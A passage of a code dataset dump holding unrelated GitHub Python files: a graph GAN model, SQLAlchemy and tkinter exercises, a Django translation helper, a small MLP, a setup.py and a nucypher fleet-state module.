NNConv(nbr_of_regions, nbr_of_regions, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv11 = BatchNorm(nbr_of_regions, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, nbr_of_regions), ReLU())\r\n self.conv2 = NNConv(nbr_of_regions, 1, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv22 = BatchNorm(1, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, nbr_of_regions), ReLU())\r\n self.conv3 = NNConv(1, nbr_of_regions, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv33 = BatchNorm(nbr_of_regions, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n def forward(self, data):\r\n x, edge_index, edge_attr = data.x, data.edge_index, data.edge_attr\r\n\r\n x1 = F.sigmoid(self.conv11(self.conv1(x, edge_index, edge_attr)))\r\n x1 = F.dropout(x1, training=self.training)\r\n\r\n x2 = F.sigmoid(self.conv22(self.conv2(x1, edge_index, edge_attr)))\r\n x2 = F.dropout(x2, training=self.training)\r\n\r\n x3 = torch.cat([F.sigmoid(self.conv33(self.conv3(x2, edge_index, edge_attr))), x1], dim=1)\r\n x4 = x3[:, 0:nbr_of_regions]\r\n x5 = x3[:, nbr_of_regions:2 * nbr_of_regions]\r\n\r\n x6 = (x4 + x5) / 2\r\n return (x6 + torch.transpose(x6, 0, 1)) / 2\r\n\r\n\r\nclass Discriminator(torch.nn.Module):\r\n def __init__(self):\r\n super(Discriminator, self).__init__()\r\n nn = Sequential(Linear(1, (nbr_of_regions * nbr_of_regions)), ReLU())\r\n self.conv1 = NNConv(nbr_of_regions, nbr_of_regions, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv11 = BatchNorm(nbr_of_regions, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, nbr_of_regions), ReLU())\r\n self.conv2 = NNConv(nbr_of_regions, 1, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv22 = BatchNorm(1, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n def forward(self, data):\r\n x, edge_index, edge_attr = data.x, data.edge_index, data.edge_attr\r\n\r\n x = F.relu(self.conv11(self.conv1(x, edge_index, edge_attr)))\r\n x = 
F.dropout(x, training=self.training)\r\n x = F.relu(self.conv22(self.conv2(x, edge_index, edge_attr)))\r\n\r\n return F.sigmoid((x + torch.transpose(x, 0, 1)) / 2)\r\n\r\n# ----------------------------------------\r\n# Training\r\n# ----------------------------------------\r\n\r\n\r\ndef register(args, generator, discriminator1, adversarial_loss, l1_loss, train_casted_source, train_casted_target,\r\n type):\r\n\r\n # Train Generator\r\n with torch.autograd.set_detect_anomaly(True):\r\n registered_outputs = []\r\n\r\n for data_A in train_casted_source:\r\n generators_output_ = generator(data_A).to(device) # 35 x35\r\n if type == 1:\r\n registered_outputs.append(generators_output_.detach())\r\n else:\r\n registered_outputs.append(generators_output_)\r\n generators_output = generators_output_.view(1, args.nbr_of_regions, args.nbr_of_regions, 1).type(\r\n torch.FloatTensor)\r\n if type == 0:\r\n generators_output_casted = [d.to(device) for d in cast_data(generators_output, 0)]\r\n for (data_discriminator) in generators_output_casted:\r\n discriminator_output_of_gen = discriminator1(data_discriminator).to(device)\r\n g_loss_adversarial = adversarial_loss(discriminator_output_of_gen,\r\n torch.ones_like(discriminator_output_of_gen).to(device))\r\n\r\n g_loss_pix2pix = l1_loss(generators_output_,\r\n train_casted_target[0].edge_attr.view(args.nbr_of_regions,\r\n args.nbr_of_regions))\r\n\r\n g_loss = g_loss_adversarial + (args.hyper_param1 * g_loss_pix2pix)\r\n loss_generator = g_loss\r\n\r\n discriminator_output_for_real_loss = discriminator1(train_casted_target[0]).to(device)\r\n\r\n real_loss = adversarial_loss(discriminator_output_for_real_loss,\r\n (torch.ones_like(discriminator_output_for_real_loss,\r\n requires_grad=False).to(device)))\r\n fake_loss = adversarial_loss(discriminator_output_of_gen.detach(),\r\n torch.zeros_like(discriminator_output_of_gen).to(device))\r\n\r\n d_loss = (real_loss + fake_loss) / 2\r\n loss_discriminator = d_loss\r\n\r\n if type == 0:\r\n return loss_generator, loss_discriminator, torch.stack(registered_outputs)\r\n else:\r\n return torch.stack(registered_outputs)\r\n","repo_name":"basiralab/GRN","sub_path":"gGAN.py","file_name":"gGAN.py","file_ext":"py","file_size_in_byte":14943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"16988660563","text":"from sqlalchemy import Table, Column, Integer, Text, select, insert\n\nfrom db import db_connect, create_tables, metadata\nfrom utils import print_result\n\nengine, connection = db_connect()\n\ndepartment = Table(\n \"departments\",\n metadata,\n Column(\"department_id\", Integer, primary_key=True),\n Column(\"department_name\", Text, nullable=False),\n)\n\nstudent = Table(\n \"students\",\n metadata,\n Column(\"student_id\", Integer, primary_key=True),\n Column(\"student_name\", Text, nullable=False),\n Column(\"department_id\", Integer, nullable=False),\n)\n\ncreate_tables(engine)\n\nnew_departments = [\n {\"department_name\": \"Electrical Engineering\"},\n {\"department_name\": \"Computer Engineering\"},\n {\"department_name\": \"Business Administration\"},\n]\n\nnew_students = [\n {\"student_name\": \"Alice\", \"department_id\": 1},\n {\"student_name\": \"Bob\", \"department_id\": 7},\n {\"student_name\": \"Jennifer\", \"department_id\": 13},\n {\"student_name\": \"Jasmine\", \"department_id\": 14},\n {\"student_name\": \"Steve\", \"department_id\": 77},\n {\"student_name\": \"Luis\", \"department_id\": 74},\n {\"student_name\": \"Jonathan\", 
\"department_id\": 1},\n {\"student_name\": \"Daiana\", \"department_id\": 7},\n {\"student_name\": \"Madelynn\", \"department_id\": 33},\n {\"student_name\": \"John\", \"department_id\": 1},\n]\n\nconnection.execute(insert(department), new_departments)\nconnection.execute(insert(student), new_students)\nconnection.commit()\n\nquery = (\n select(student.c.student_id, student.c.student_name)\n .where(student.c.department_id.not_in(select(department.c.department_id)))\n)\nresult = connection.execute(query)\nprint_result(result)\n\nconnection.close()\n","repo_name":"redmonkez12/sqlalchemy-practice","sub_path":"task_15/task_15_core.py","file_name":"task_15_core.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"26430706003","text":"from app.models import *\nfrom website.models import *\nfrom googletrans import Translator\ntranslator = Translator()\n\n#---------Industry translation----------------------------\ndef industryTranslation(user,language):\n \"\"\"Translation fuction of industry data from english ro franch language.\"\"\"\n industry1 = UserIndustryModel.objects.filter(user=user)\n my_list = []\n for data in industry1:\n my_dict={'industry_type':translator.translate(data.industry.industry_type,language).text}\n my_list.append(my_dict)\n return my_list\n\n#------------------------area tanslation---------------------------------\ndef areaTranslation(user,language):\n \"\"\"Translation fuction of area data from english ro franch language.\"\"\"\n area = UserAreaModel.objects.filter(user=user)\n my_list = []\n for data in area:\n my_dict={'area':translator.translate(data.area.area,language).text}\n my_list.append(my_dict)\n return my_list\n\ndef skillTranslation(user,language):\n \"\"\"Translation fuction of skill data from english ro franch language.\"\"\"\n skill = UserToolsAndLanguageModel.objects.filter(user=user)\n my_list = []\n for data in skill:\n my_dict={'skill':translator.translate(data.skill.name,language).text,\"rating\":data.rating}\n my_list.append(my_dict)\n return my_list\n#-------------User Language translation---------------------\ndef languageTranslation(user,language):\n \"\"\"Translation fuction of speaking language data from english ro franch language.\"\"\"\n lan = UserLanguageModel.objects.filter(user=user)\n my_list = []\n for data in lang:\n my_dict={'language':translator.translate(data.userLanguage.language_name,language).text,'rating':data.rating}\n my_list.append(my_dict)\n return my_list\n\n#--------------Education data------------------------\ndef EducationTranslation(user,language):\n \"\"\"Translation Education of Job Seeker from one language to another langyage\"\"\"\n edu = UserEducationModel.objects.filter(user=user)\n my_list = []\n for data in lang:\n my_dict={\n 'schoolName':translator.translate(data.schoolName,language).text,\n 'university_name':translator.translate(data.university_name,language).text,\n 'board':translator.translate(data.board,language).text,\n 'percentage':data.percentage,\n 'yos':data.yos,\n 'yop':data.yop,\n 'course':translator.translate(data.course,language).text,\n 'stream':translator.translate(data.stream,language).text,\n 'activity':translator.translate(data.activity,language).text,\n 'description':translator.translate(data.description,language).text, \n }\n my_list.append(my_dict)\n return my_list\n\n#-------------Personal Detail------------------------------------\ndef personalDetailTranslation(user,language):\n 
\"\"\"Job Seeker Personal data is translated form one languae to another\"\"\"\n personal = PersonalDetailModel.objects.get(user=user)\n my_dict={\n 'id':personal.id,\n 'working_hour':translator.translate(personal.work_hour.working_hour,language).text,\n 'professional_title':translator.translate(personal.professional_title,language).text,\n 'professional_description':translator.translate(personal.professional_description,language).text,\n 'paypal_account_id':translator.translate(personal.paypal_account_id,language).text,\n 'country':translator.translate(personal.country,language).text,\n 'timezone':translator.translate(personal.timezone,language).text,\n 'postal_code':translator.translate(personal.postal_code,language).text,\n 'city':translator.translate(personal.city,language).text,\n 'mobile':translator.translate(personal.mobile,language).text\n }\n return my_dict\n\n ","repo_name":"nutan0143sonu/ineedweb","sub_path":"website/translations.py","file_name":"translations.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36136287690","text":"stockApple = 5\nstockGrape = 7\nstockOrange = 8\n\npriceApple = 10000\npriceGrape = 15000\npriceOrange = 20000\n\n# User akan menginput jumlah qty buah yg diinginkan\nqtyApple = int(input('Masukkan jumlah Apel : '))\n# Jika permintaan user melebihi stock\nif qtyApple > stockApple:\n print(f'Kesalahan input, stock Apel : {stockApple}')\n qtyApple = 0\n\n# User akan menginput jumlah qty buah yg diinginkan\nqtyGrape = int(input('Masukkan jumlah Anggur : '))\n# Jika permintaan user melebihi stock\nif qtyGrape > stockGrape:\n print(f'Kesalahan input, stock Anggur : {stockGrape}')\n qtyGrape = 0\n\n# User akan menginput jumlah qty buah yg diinginkan\nqtyOrange = int(input('Masukkan jumlah Jeruk : '))\n# Jika permintaan user melebihi stock\nif qtyOrange > stockOrange:\n print(f'Kesalahan input, stock Jeruk : {stockOrange}')\n qtyOrange = 0\n\n# Hitung total harga setiap buah\ntotalApple = qtyApple * priceApple\ntotalGrape = qtyGrape * priceGrape\ntotalOrange = qtyOrange * priceOrange\n\n# Hitung total belanja keseluruhan\ntotalPrice = totalApple + totalGrape + totalOrange\n\nprint(\n 'Detail Belanja \\n\\n' +\n f'Apel : {qtyApple} x {priceApple} = {totalApple}\\n' +\n f'Anggur : {qtyGrape} x {priceGrape} = {totalGrape}\\n' +\n f'Jeruk : {qtyOrange} x {priceOrange} = {totalOrange}\\n\\n' +\n f'Total : {totalPrice}'\n)","repo_name":"abdurrahmanshidiq/fundamental-python","sub_path":"PYTHON/logic_if/scratchpad3.py","file_name":"scratchpad3.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28112020467","text":"# -*- coding: utf-8 -*-\nfrom tkinter import *\n\nfrom Model.Constants import BACKGROUND_COLOR\n\n\nclass Field(Frame):\n __doc__ = \"\"\"Class for the creation Field. 
print(\n    'Detail Belanja \\n\\n' +\n    f'Apel : {qtyApple} x {priceApple} = {totalApple}\\n' +\n    f'Anggur : {qtyGrape} x {priceGrape} = {totalGrape}\\n' +\n    f'Jeruk : {qtyOrange} x {priceOrange} = {totalOrange}\\n\\n' +\n    f'Total : {totalPrice}'\n)","repo_name":"abdurrahmanshidiq/fundamental-python","sub_path":"PYTHON/logic_if/scratchpad3.py","file_name":"scratchpad3.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28112020467","text":"# -*- coding: utf-8 -*-\nfrom tkinter import *\n\nfrom Model.Constants import BACKGROUND_COLOR\n\n\nclass Field(Frame):\n    __doc__ = \"\"\"Class for the creation of a Field. This is a Frame with a Label\n    on the left side and an Entry on the right side.\"\"\"\n\n    def __init__(self, parent=None, label=None, entry=\"\", **options):\n        Frame.__init__(self, parent, bg=BACKGROUND_COLOR, **options)\n        left = Frame(self, bg=BACKGROUND_COLOR)\n        right = Frame(self, bg=BACKGROUND_COLOR)\n        self.pack(fill=X)\n        left.pack(side=LEFT)\n        right.pack(side=RIGHT, expand=YES, fill=X)\n\n        lab = Label(left, bg=BACKGROUND_COLOR, width=8, text=label)\n        self.ent = Entry(right)\n\n        self.var = StringVar()\n        self.var.set(str(entry))\n        self.ent.config(textvariable=self.var)\n\n        lab.pack(side=TOP)\n        self.ent.pack(side=TOP, fill=X)\n\n    def get_variable(self):\n        \"\"\"Get the variable inside the Entry.\"\"\"\n        return self.var\n\n    def set_variable(self, s):\n        \"\"\"Set the model's variable of the Entry. Use this to automatically update\n        the field's view.\"\"\"\n        self.var.set(str(s))\n","repo_name":"Emanz93/PIClassifier","sub_path":"GUI/Field.py","file_name":"Field.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32479222020","text":"import sys\nsys.stdin = open(\"input.txt\", \"r\")\n\ndef subset(k, sum):\n    global result, S, mini\n    if k == N:\n        for i in range(N):\n            if bit[i] == 1:\n                sum += arr[i]\n        result = sum - S\n        if result >= 0 and mini > result:\n            mini = result\n        return\n    else:\n        bit[k] = 0\n        subset(k+1, sum)\n        bit[k] = 1\n        subset(k+1, sum)\n\nT = int(input())\nfor tc in range(1, T+1):\n    N, S = map(int, input().split())\n    arr = list(map(int, input().split()))\n    length = len(arr)\n    result=[]\n    mini = 99999\n    bit = [0] * length\n    subset(0,0)\n    print(\"#{} {}\".format(tc, mini))\n","repo_name":"Haesungkang/Algorithm","sub_path":"2020/0907/장훈이의높은선반_강해성.py","file_name":"장훈이의높은선반_강해성.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33443011460","text":"import nltk\nfrom nltk import pos_tag, word_tokenize\nfrom nltk.corpus import wordnet as wn\nnltk.download('averaged_perceptron_tagger')\nnltk.download('wordnet')\nnltk.download('punkt')\n\ndef validate_noun(word):\n    \n    synsets = wn.synsets(word, pos=wn.NOUN)\n    if synsets:\n        \n        for synset in synsets:\n            if word.lower() in synset.lemma_names():\n                return True\n    return False\n\ndef validate_user_input(input_text):\n\n    inappropriate_words = [\"explicit_word\", \"other_inappropriate_word\"]\n\n    nouns = [word for word, pos in pos_tag(word_tokenize(input_text)) if pos.startswith('NN')]\n    if not nouns:\n        return False\n\n    specific_nouns = [noun for noun in nouns if validate_noun(noun.lower()) and noun.lower() not in inappropriate_words]\n\n    if specific_nouns:\n        return True\n    return False\n\n\nuser_input = input(\"Enter your input: \")\nis_valid = validate_user_input(user_input)\n\nif is_valid:\n    print(\"The input is appropriate.\")\nelse:\n    print(\"The input is not appropriate.\")","repo_name":"AI-Tech-Challenge/chroma-search","sub_path":"app/validation/Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41477678125","text":"import os\nimport setuptools\n\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n\ndef read(fname):\n    with open(fname, \"r\") as f:\n        return f.read()\n\n\ninstall_requires = [\n    l\n    for l in read(os.path.join(dir_path, \"requirements.txt\")).splitlines()\n    if l and not 
l.startswith(\"#\")\n]\n\n\nsetuptools.setup(\n name=\"starlette-jsonrpc\",\n version=\"0.2.0\",\n author=\"Kamil Dębowski\",\n author_email=\"poczta@kdebowski.pl\",\n description=\"JSON-RPC implementation for Starlette framework\",\n long_description=read(\"README.md\"),\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/kdebowski/starlette-jsonrpc\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Intended Audience :: Developers\",\n ],\n install_requires=install_requires,\n include_package_data=True,\n)\n","repo_name":"kdebowski/starlette-jsonrpc","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"27"} +{"seq_id":"72608469512","text":"#!/usr/bin/python\nimport math\nimport pandas as pd\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\n\ndf = pd.read_excel('input.xlsx', sheet_name='Sheet1')\n\n# taxa de aprendizagem - learning rate between 0 and 1\nlRate = 0.5\n\n# sinal de entrada - input value\nx0 = 1 # x0 is always +1\nx1 = df['x1']\n\n# valor desejado - desired value\nd = df['d']\n\n# numero de exemplos\nnEx = x1.count()\n\n# pesos dos neuronios da primeira camada // w1 = [(0.1, -0.3), (-0.7, 0.4)]\nw110 = 0.1\nw111 = -0.3\nw120 = -0.7\nw121 = 0.4\n\n# pesos dos neuronios da camada escondida // w2 = [-0.6, 0.1, -0.8]\nw210 = -0.6\nw211 = 0.1\nw212 = -0.8\n\nlog = open(\"output.txt\", \"w\") # create/open the file to write the log\n\n\n'''\n1) calculo da entrada liquida para os neuronios da camada escondida\nnet11 = ((w110 * x0) + (w111 * x1))\nnet12 = ((w120 * x0) + (w121 * x1))\n'''\n\n\ndef calculateNet4HiddenLayer(example):\n net11 = ((w110 * x0) + (w111 * x1[example]))\n net12 = ((w120 * x0) + (w121 * x1[example]))\n log.write('\\nnet11: ' + str(net11) + '\\tnet12: ' + str(net12))\n return (net11, net12)\n\n\n'''\n2) calculo da funcao de saida para os neuronios da camada escondida\ny11 = (1/(1 + math.exp(-net11)))\ny12 = (1/(1 + math.exp(-net12)))\n'''\n\n\ndef calculateY4HiddenLayer(net11, net12):\n y11 = (1/(1 + math.exp(-net11)))\n y12 = (1/(1 + math.exp(-net12)))\n log.write('\\ny11: ' + str(y11) + '\\ty12: ' + str(y12))\n return (y11, y12)\n\n\n'''\n3) calculo da entrada liquida para os neuronios de saida\nnet21 = ((w210*x0) + (w211*y11) + (w212*y12))\n'''\n\n\ndef calculateNet4Output(y11, y12):\n net21 = ((w210*x0) + (w211*y11) + (w212*y12))\n log.write('\\nnet21: ' + str(net21))\n return net21\n\n\n'''\n4) calculo da funcao de saida para os neuronios da camada de saida\ny21 = (1/(1 + math.exp(-net21)))\n'''\n\n\ndef calculateY4Output(net21):\n y21 = (1/(1 + math.exp(-net21)))\n log.write('\\ny21: ' + str(y21))\n return y21\n\n\n'''\n5) calculo do erro para os neuronios da camada de saida\nerror = (d - y21)\n'''\n\n\ndef calculateError(y21):\n error = (d - y21)\n log.write('\\nerror: ' + str(error))\n return error\n\n\n'''\n6) calculo das sensibilidades para os neuronios da camada de saida\ns21 = y21*(1-y21)*error\n'''\n\n\ndef calculateSensibility4OutputLayer(y21, error):\n s21 = y21*(1-y21)*error\n log.write('\\ns21: ' + str(s21))\n return s21\n\n\n'''\n7) calculo das sensibilidades para os neuronios da camada escondida\ns11 = y11*(1-y11)*w211*s21\ns12 = y12*(1-y12)*w212*s21\n'''\n\n\ndef calculateSensibility4HiddenLayer(y11, 
'''\n5) calculation of the error for the output-layer neurons\nerror = (d[example] - y21)\n'''\n\n\ndef calculateError(y21, example):\n    # compare against the desired value of the current example only\n    error = (d[example] - y21)\n    log.write('\\nerror: ' + str(error))\n    return error\n\n\n'''\n6) calculation of the sensitivities for the output-layer neurons\ns21 = y21*(1-y21)*error\n'''\n\n\ndef calculateSensibility4OutputLayer(y21, error):\n    s21 = y21*(1-y21)*error\n    log.write('\\ns21: ' + str(s21))\n    return s21\n\n\n'''\n7) calculation of the sensitivities for the hidden-layer neurons\ns11 = y11*(1-y11)*w211*s21\ns12 = y12*(1-y12)*w212*s21\n'''\n\n\ndef calculateSensibility4HiddenLayer(y11, y12, s21):\n    s11 = y11*(1-y11)*w211*s21\n    s12 = y12*(1-y12)*w212*s21\n    log.write('\\ns11: ' + str(s11) + '\\ts12: ' + str(s12))\n    return (s11, s12)\n\n\n'''\n8) readjustment of the weights linking the output layer to the hidden layer\nw2ij(new) = w2ij(old) + alpha*s2i*f1(net1j)\n'''\n\n\ndef balanceWeightOutputLayer(s21, y11, y12):\n    global w210, w211, w212\n    # j = 0 is the bias input x0; j = 1, 2 are the hidden outputs y11, y12\n    w210 = float(format((w210 + lRate*s21*x0), '.2f'))\n    w211 = float(format((w211 + lRate*s21*y11), '.2f'))\n    w212 = float(format((w212 + lRate*s21*y12), '.2f'))\n\n\n'''\n9) readjustment of the weights linking the hidden layer to the input layer\nw1ij(new) = w1ij(old) + alpha * s1i * xj\n'''\n\n\ndef balanceWeightHiddenLayer(s11, s12, example):\n    global w110, w111, w120, w121\n    # each hidden neuron's weights use its own sensitivity and the inputs x0, x1\n    w110 = float(format((w110 + lRate*s11*x0), '.2f'))\n    w111 = float(format((w111 + lRate*s11*x1[example]), '.2f'))\n    w120 = float(format((w120 + lRate*s12*x0), '.2f'))\n    w121 = float(format((w121 + lRate*s12*x1[example]), '.2f'))\n\n\nfor i in range(nEx):\n    log.write('---------------Example' + str(i))\n    (net11, net12) = calculateNet4HiddenLayer(i)\n    (y11, y12) = calculateY4HiddenLayer(net11, net12)\n    net21 = calculateNet4Output(y11, y12)\n    y21 = calculateY4Output(net21)\n    error = calculateError(y21, i)\n    s21 = calculateSensibility4OutputLayer(y21, error)\n    (s11, s12) = calculateSensibility4HiddenLayer(y11, y12, s21)\n    balanceWeightOutputLayer(s21, y11, y12)\n    balanceWeightHiddenLayer(s11, s12, i)\n\nlog.close()\n","repo_name":"barbixxxa/neural-network","sub_path":"mlp/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"69989757511","text":"\n\n\nimport random\nimport weakref\nfrom collections import deque\nfrom collections.abc import KeysView\nfrom typing import Any, Dict, Iterable, List, NamedTuple, Optional, Union\n\nimport maya\nfrom eth_typing import ChecksumAddress\nfrom nucypher_core import FleetStateChecksum, NodeMetadata\n\nfrom nucypher import characters\nfrom nucypher.utilities.logging import Logger\n\nfrom .nicknames import Nickname\n\n\nclass ArchivedFleetState(NamedTuple):\n\n    checksum: str\n    nickname: Nickname\n    timestamp: maya.MayaDT\n    population: int\n\n    def to_json(self):\n        return dict(checksum=bytes(self.checksum).hex(),\n                    nickname=self.nickname.to_json(),\n                    timestamp=self.timestamp.rfc2822(),\n                    population=self.population)\n\n\nclass StateDiff(NamedTuple):\n    this_node_updated: bool\n    nodes_updated: List[ChecksumAddress]\n    nodes_removed: List[ChecksumAddress]\n\n    def empty(self):\n        return not self.this_node_updated and not self.nodes_updated and not self.nodes_removed\n\n\nclass FleetState:\n    \"\"\"\n    Fleet state as perceived by a local \"Ursula\".\n\n    Assumptions we're based on:\n\n    - Every supplied node object, after its constructor has finished,\n      has a ``.checksum_address`` and ``bytes()`` (metadata)\n    - checksum address or metadata do not change for the same Python object\n    - ``this_node`` (the owner of FleetSensor) may not have metadata initially\n      (when the constructor is first called), but will have one at the time of the first\n      `record_fleet_state()` call.\n    - The metadata of ``this_node`` **can** change.\n    - For the purposes of the fleet state, nodes with different metadata are considered different,\n      even if they have the same checksum address.\n    \"\"\"\n\n    @classmethod\n    def new(\n        cls, this_node: Optional[\"characters.lawful.Ursula\"] = None\n    ) -> \"FleetState\":\n        this_node_ref = weakref.ref(this_node) if this_node else None\n        # `this_node` might not have its metadata available yet.\n        this_node_metadata = None\n\n        return 
cls(nodes={},\n this_node_ref=this_node_ref,\n this_node_metadata=this_node_metadata)\n\n def __init__(\n self,\n nodes: Dict[ChecksumAddress, \"characters.lawful.Ursula\"],\n this_node_ref: Optional[weakref.ReferenceType],\n this_node_metadata: Optional[NodeMetadata],\n ):\n self.checksum = FleetStateChecksum(\n this_node=this_node_metadata,\n other_nodes=[node.metadata() for node in nodes.values()],\n )\n self.nickname = Nickname.from_seed(bytes(self.checksum), length=1)\n self._nodes = nodes\n self.timestamp = maya.now()\n self._this_node_ref = this_node_ref\n self._this_node_metadata = this_node_metadata\n\n def archived(self) -> ArchivedFleetState:\n return ArchivedFleetState(checksum=self.checksum,\n nickname=self.nickname,\n timestamp=self.timestamp,\n population=self.population)\n\n def _calculate_diff(\n self,\n this_node_updated: bool,\n nodes_to_add: Iterable[\"characters.lawful.Ursula\"],\n nodes_to_remove: Iterable[ChecksumAddress],\n ) -> StateDiff:\n nodes_updated = []\n for node in nodes_to_add:\n if node.checksum_address in nodes_to_remove:\n continue\n unknown = node.checksum_address not in self._nodes\n if unknown or bytes(self._nodes[node.checksum_address].metadata()) != bytes(node.metadata()):\n nodes_updated.append(node.checksum_address)\n\n nodes_removed = []\n for checksum_address in nodes_to_remove:\n if checksum_address in self._nodes:\n nodes_removed.append(checksum_address)\n\n return StateDiff(this_node_updated=this_node_updated,\n nodes_updated=nodes_updated,\n nodes_removed=nodes_removed)\n\n def with_updated_nodes(\n self,\n nodes_to_add: Iterable[\"characters.lawful.Ursula\"],\n nodes_to_remove: Iterable[ChecksumAddress],\n skip_this_node: bool = False,\n ) -> \"FleetState\":\n if self._this_node_ref is not None and not skip_this_node:\n this_node = self._this_node_ref()\n this_node_metadata = this_node.metadata()\n this_node_updated = self._this_node_metadata != this_node_metadata\n else:\n this_node_metadata = self._this_node_metadata\n this_node_updated = False\n\n diff = self._calculate_diff(this_node_updated, nodes_to_add, nodes_to_remove)\n\n if not diff.empty():\n # TODO: if nodes were kept in a Merkle tree,\n # we'd have to only recalculate log(N) checksums.\n # Is it worth it?\n nodes = dict(self._nodes)\n nodes_to_add_dict = {node.checksum_address: node for node in nodes_to_add}\n for checksum_address in diff.nodes_updated:\n new_node = nodes_to_add_dict[checksum_address]\n nodes[checksum_address] = new_node\n for checksum_address in diff.nodes_removed:\n del nodes[checksum_address]\n else:\n nodes = self._nodes\n\n new_state = FleetState(nodes=nodes,\n this_node_ref=self._this_node_ref,\n this_node_metadata=this_node_metadata)\n\n return new_state, diff\n\n @property\n def population(self) -> int:\n \"\"\"Returns the number of all known nodes, including itself, if applicable.\"\"\"\n return len(self) + int(self._this_node_metadata is not None)\n\n def __getitem__(self, checksum_address):\n return self._nodes[checksum_address]\n\n def addresses(self) -> KeysView:\n return self._nodes.keys()\n\n def __bool__(self):\n return len(self) != 0\n\n def __contains__(self, item):\n if isinstance(item, str):\n return item in self._nodes\n else:\n return item.checksum_address in self._nodes\n\n def __iter__(self):\n yield from self._nodes.values()\n\n def __len__(self):\n return len(self._nodes)\n\n def shuffled(self) -> List[\"characters.lawful.Ursula\"]:\n nodes_we_know_about = list(self._nodes.values())\n random.shuffle(nodes_we_know_about)\n return 
nodes_we_know_about\n\n def to_json(self) -> Dict:\n return dict(nickname=self.nickname.to_json(),\n updated=self.timestamp.rfc2822())\n\n @property\n def icon(self) -> str:\n return self.nickname.icon\n\n def items(self):\n return self._nodes.items()\n\n def values(self):\n return self._nodes.values()\n\n def __str__(self):\n return '{checksum} ⇀{nickname}↽ {icon} '.format(icon=self.nickname.icon,\n nickname=self.nickname,\n checksum=bytes(self.checksum).hex()[:7])\n\n def __repr__(self):\n return f\"FleetState({self.checksum}, {self._nodes}, {self._this_node_ref}, {self._this_node_metadata})\"\n\n\nclass FleetSensor:\n \"\"\"\n A representation of a fleet of NuCypher nodes.\n\n If `this_node` is provided, it will be included in the state checksum\n (but not returned during iteration/lookups).\n \"\"\"\n log = Logger(\"Learning\")\n\n def __init__(\n self, domain: str, this_node: Optional[\"characters.lawful.Ursula\"] = None\n ):\n self._domain = domain\n\n self._current_state = FleetState.new(this_node)\n self._archived_states = deque([self._current_state.archived()], maxlen=5)\n self._remote_states = {}\n self._remote_last_seen = {}\n\n # temporary accumulator for new nodes to avoid updating the fleet state every time\n self._nodes_to_add = set()\n self._nodes_to_remove = set() # Beginning of bucketing.\n\n self._auto_update_state = False\n\n def record_node(self, node: \"characters.lawful.Ursula\"):\n\n if node.domain == self._domain:\n # Replace the existing object with a newer object, even if they're equal\n # (this object can be mutated externally).\n # This behavior is supposed to be consistent with that of the node storage\n # (where a newer object with the same `checksum_address` replaces an older one).\n if node in self._nodes_to_add:\n self._nodes_to_add.remove(node)\n self._nodes_to_add.add(node)\n\n if self._auto_update_state:\n self.log.info(f\"Updating fleet state after saving node {node}\")\n self.record_fleet_state()\n else:\n msg = f\"Rejected node {node} because its domain is '{node.domain}' but we're only tracking '{self._domain}'\"\n self.log.warn(msg)\n\n def __getitem__(self, item):\n return self._current_state[item]\n\n def __bool__(self):\n return bool(self._current_state)\n\n def __contains__(self, item):\n \"\"\"\n Checks if the node *with the same metadata* is recorded in the current state.\n Does not compare ``item`` with the owner node of this FleetSensor.\n \"\"\"\n return item in self._current_state\n\n def __iter__(self):\n yield from self._current_state\n\n def __len__(self):\n return len(self._current_state)\n\n def __repr__(self):\n return f\"FleetSensor({self._current_state.__repr__()})\"\n\n @property\n def current_state(self):\n return self._current_state\n\n @property\n def checksum(self):\n return self._current_state.checksum\n\n @property\n def population(self):\n return self._current_state.population\n\n @property\n def nickname(self):\n return self._current_state.nickname\n\n @property\n def icon(self) -> str:\n return self._current_state.icon\n\n @property\n def timestamp(self):\n return self._current_state.timestamp\n\n def items(self):\n return self._current_state.items()\n\n def values(self):\n return self._current_state.values()\n\n def latest_state(self) -> ArchivedFleetState:\n # `_archived_states` is never empty, one state is created in the constructor\n return self._archived_states[-1]\n\n def previous_states(self, quantity: int) -> List[ArchivedFleetState]:\n \"\"\"\n Returns at most 